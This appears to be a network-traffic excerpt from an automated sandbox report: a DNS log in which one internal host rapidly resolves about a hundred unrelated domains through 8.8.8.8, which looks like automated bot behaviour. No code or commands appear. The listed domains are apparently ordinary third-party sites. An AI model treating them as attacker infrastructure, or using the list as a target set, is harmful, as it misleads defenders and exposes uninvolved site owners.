                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.424351931 CEST8.8.8.8192.168.2.40xe251No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.424351931 CEST8.8.8.8192.168.2.40xe251No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.424351931 CEST8.8.8.8192.168.2.40xe251No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.424351931 CEST8.8.8.8192.168.2.40xe251No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.436167955 CEST8.8.8.8192.168.2.40x3530No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.499748945 CEST8.8.8.8192.168.2.40x32fdNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.562903881 CEST8.8.8.8192.168.2.40xd4fcNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.579612970 CEST8.8.8.8192.168.2.40x12c2No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.689198017 CEST8.8.8.8192.168.2.40x8d4aNo error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.689771891 CEST8.8.8.8192.168.2.40xac6No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.689771891 CEST8.8.8.8192.168.2.40xac6No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.689771891 CEST8.8.8.8192.168.2.40xac6No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.689771891 CEST8.8.8.8192.168.2.40xac6No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.789928913 CEST8.8.8.8192.168.2.40xdad3No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.801971912 CEST8.8.8.8192.168.2.40xacf8No error (0)cvswl.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.801971912 CEST8.8.8.8192.168.2.40xacf8No error (0)cvswl.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.811942101 CEST8.8.8.8192.168.2.40x88bServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.811995983 CEST8.8.8.8192.168.2.40xa5f0No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.812283993 CEST8.8.8.8192.168.2.40x670dNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.812283993 CEST8.8.8.8192.168.2.40x670dNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.819286108 CEST8.8.8.8192.168.2.40xae76No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.824330091 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.824330091 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.824330091 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.831402063 CEST8.8.8.8192.168.2.40xa343Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.903093100 CEST8.8.8.8192.168.2.40xa656No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.911494970 CEST8.8.8.8192.168.2.40x1c6dNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.917457104 CEST8.8.8.8192.168.2.40x6c8No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.947308064 CEST8.8.8.8192.168.2.40x6723No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.004300117 CEST8.8.8.8192.168.2.40x1395No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.020648003 CEST8.8.8.8192.168.2.40x397cNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.045737028 CEST8.8.8.8192.168.2.40xca35No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.142456055 CEST8.8.8.8192.168.2.40xa61No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.142456055 CEST8.8.8.8192.168.2.40xa61No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.208096027 CEST8.8.8.8192.168.2.40xd7d4Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.311726093 CEST8.8.8.8192.168.2.40xaad2No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.376249075 CEST8.8.8.8192.168.2.40xe2eNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.379833937 CEST8.8.8.8192.168.2.40xe204No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.481738091 CEST8.8.8.8192.168.2.40xd455No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.481738091 CEST8.8.8.8192.168.2.40xd455No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.570504904 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.570504904 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.570504904 CEST8.8.8.8192.168.2.40xad6eNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.573364973 CEST8.8.8.8192.168.2.40x63a2No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.655327082 CEST8.8.8.8192.168.2.40x6acfNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.655327082 CEST8.8.8.8192.168.2.40x6acfNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.655327082 CEST8.8.8.8192.168.2.40x6acfNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.738707066 CEST8.8.8.8192.168.2.40xf78bNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.738707066 CEST8.8.8.8192.168.2.40xf78bNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.738707066 CEST8.8.8.8192.168.2.40xf78bNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.738707066 CEST8.8.8.8192.168.2.40xf78bNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.767596960 CEST8.8.8.8192.168.2.40x4b0bServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.898411036 CEST8.8.8.8192.168.2.40xac7cServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.998347998 CEST8.8.8.8192.168.2.40xde82Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.163372040 CEST8.8.8.8192.168.2.40xa873Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.173377991 CEST8.8.8.8192.168.2.40x144fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.239377975 CEST8.8.8.8192.168.2.40xeac9Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.248951912 CEST8.8.8.8192.168.2.40xe668No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.256875992 CEST8.8.8.8192.168.2.40xbd3No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.256875992 CEST8.8.8.8192.168.2.40xbd3No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.348669052 CEST8.8.8.8192.168.2.40x4a98No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.348669052 CEST8.8.8.8192.168.2.40x4a98No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.425154924 CEST8.8.8.8192.168.2.40xd7d4Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.585170984 CEST8.8.8.8192.168.2.40x335bNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.800554037 CEST8.8.8.8192.168.2.40x9317No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.819556952 CEST8.8.8.8192.168.2.40x98ceNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.000852108 CEST8.8.8.8192.168.2.40xbe62No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.204893112 CEST8.8.8.8192.168.2.40x4b0bServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.247925043 CEST8.8.8.8192.168.2.40xa873Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.281493902 CEST8.8.8.8192.168.2.40x4594No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.288927078 CEST8.8.8.8192.168.2.40x4fb7No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.413054943 CEST8.8.8.8192.168.2.40xf805No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.443408012 CEST8.8.8.8192.168.2.40xf4c9Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.526051044 CEST8.8.8.8192.168.2.40xe3cbNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.648929119 CEST8.8.8.8192.168.2.40xc1aaNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.657963991 CEST8.8.8.8192.168.2.40xb246Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.789460897 CEST8.8.8.8192.168.2.40xe849No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.846112013 CEST8.8.8.8192.168.2.40x4eecNo error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.967073917 CEST8.8.8.8192.168.2.40x77b5Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.977278948 CEST8.8.8.8192.168.2.40x7497No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.036628008 CEST8.8.8.8192.168.2.40xed1dNo error (0)vivastay.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.036628008 CEST8.8.8.8192.168.2.40xed1dNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.036628008 CEST8.8.8.8192.168.2.40xed1dNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.036628008 CEST8.8.8.8192.168.2.40xed1dNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.362839937 CEST8.8.8.8192.168.2.40x4b0bServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.365376949 CEST8.8.8.8192.168.2.40xa873Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.444540024 CEST8.8.8.8192.168.2.40x9d63Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.490856886 CEST8.8.8.8192.168.2.40x78e6Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.670870066 CEST8.8.8.8192.168.2.40x645eNo error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.906233072 CEST8.8.8.8192.168.2.40xfe9cNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.925271034 CEST8.8.8.8192.168.2.40x8ddNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.336335897 CEST8.8.8.8192.168.2.40x7489Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.425739050 CEST8.8.8.8192.168.2.40xd06fNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.428483963 CEST8.8.8.8192.168.2.40x3e18No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.428483963 CEST8.8.8.8192.168.2.40x3e18No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.524584055 CEST8.8.8.8192.168.2.40x7ee9No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.524584055 CEST8.8.8.8192.168.2.40x7ee9No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.524584055 CEST8.8.8.8192.168.2.40x7ee9No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.560344934 CEST8.8.8.8192.168.2.40x6798No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.560344934 CEST8.8.8.8192.168.2.40x6798No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:53.032393932 CEST8.8.8.8192.168.2.40x8b30No error (0)shittas.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:53.516638041 CEST8.8.8.8192.168.2.40xc4eeNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:53.651814938 CEST8.8.8.8192.168.2.40x9d63Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.265652895 CEST8.8.8.8192.168.2.40x23fdNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.265652895 CEST8.8.8.8192.168.2.40x23fdNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.926314116 CEST8.8.8.8192.168.2.40xd924No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:55.077533960 CEST8.8.8.8192.168.2.40x934bNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.325665951 CEST8.8.8.8192.168.2.40xb10fNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.675543070 CEST8.8.8.8192.168.2.40x3216No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.837626934 CEST8.8.8.8192.168.2.40x679cNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.243886948 CEST8.8.8.8192.168.2.40xafe2No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.517000914 CEST8.8.8.8192.168.2.40xb130No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.517000914 CEST8.8.8.8192.168.2.40xb130No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.575691938 CEST8.8.8.8192.168.2.40x5ed8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.859973907 CEST8.8.8.8192.168.2.40xcb89No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.987461090 CEST8.8.8.8192.168.2.40x4907Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.061358929 CEST8.8.8.8192.168.2.40xd9d7Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.272442102 CEST8.8.8.8192.168.2.40xc287No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.344240904 CEST8.8.8.8192.168.2.40xb52dNo error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.607515097 CEST8.8.8.8192.168.2.40x4907Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.671240091 CEST8.8.8.8192.168.2.40x52b1No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.000200987 CEST8.8.8.8192.168.2.40x16cNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.050271034 CEST8.8.8.8192.168.2.40xba1cNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.091463089 CEST8.8.8.8192.168.2.40x5ed8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.816947937 CEST8.8.8.8192.168.2.40x48a1No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.406152010 CEST8.8.8.8192.168.2.40xb355No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.406152010 CEST8.8.8.8192.168.2.40xb355No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.462275028 CEST8.8.8.8192.168.2.40x91fNo error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.462275028 CEST8.8.8.8192.168.2.40x91fNo error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.510102034 CEST8.8.8.8192.168.2.40x8fcbName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.657236099 CEST8.8.8.8192.168.2.40xf215No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.657236099 CEST8.8.8.8192.168.2.40xf215No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.657236099 CEST8.8.8.8192.168.2.40xf215No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.657236099 CEST8.8.8.8192.168.2.40xf215No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.677776098 CEST8.8.8.8192.168.2.40x799aName error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.762445927 CEST8.8.8.8192.168.2.40xf53cNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.791618109 CEST8.8.8.8192.168.2.40x8379No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.797009945 CEST8.8.8.8192.168.2.40x48f3No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.873840094 CEST8.8.8.8192.168.2.40x1b36No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.900893927 CEST8.8.8.8192.168.2.40xe1afNo error (0)rkengg.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.900893927 CEST8.8.8.8192.168.2.40xe1afNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.900893927 CEST8.8.8.8192.168.2.40xe1afNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.900893927 CEST8.8.8.8192.168.2.40xe1afNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.918220997 CEST8.8.8.8192.168.2.40x736eNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.918220997 CEST8.8.8.8192.168.2.40x736eNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.918220997 CEST8.8.8.8192.168.2.40x736eNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.918220997 CEST8.8.8.8192.168.2.40x736eNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.002788067 CEST8.8.8.8192.168.2.40x8975No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.059174061 CEST8.8.8.8192.168.2.40x5ed8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.150665045 CEST8.8.8.8192.168.2.40x2036No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.225456953 CEST8.8.8.8192.168.2.40x6554No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.282975912 CEST8.8.8.8192.168.2.40xe658Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.313865900 CEST8.8.8.8192.168.2.40xe326No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.432288885 CEST8.8.8.8192.168.2.40xb6ffNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.529171944 CEST8.8.8.8192.168.2.40x122cNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.587378979 CEST8.8.8.8192.168.2.40x85c4No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.612251043 CEST8.8.8.8192.168.2.40xafc6No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.690157890 CEST8.8.8.8192.168.2.40xa930No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
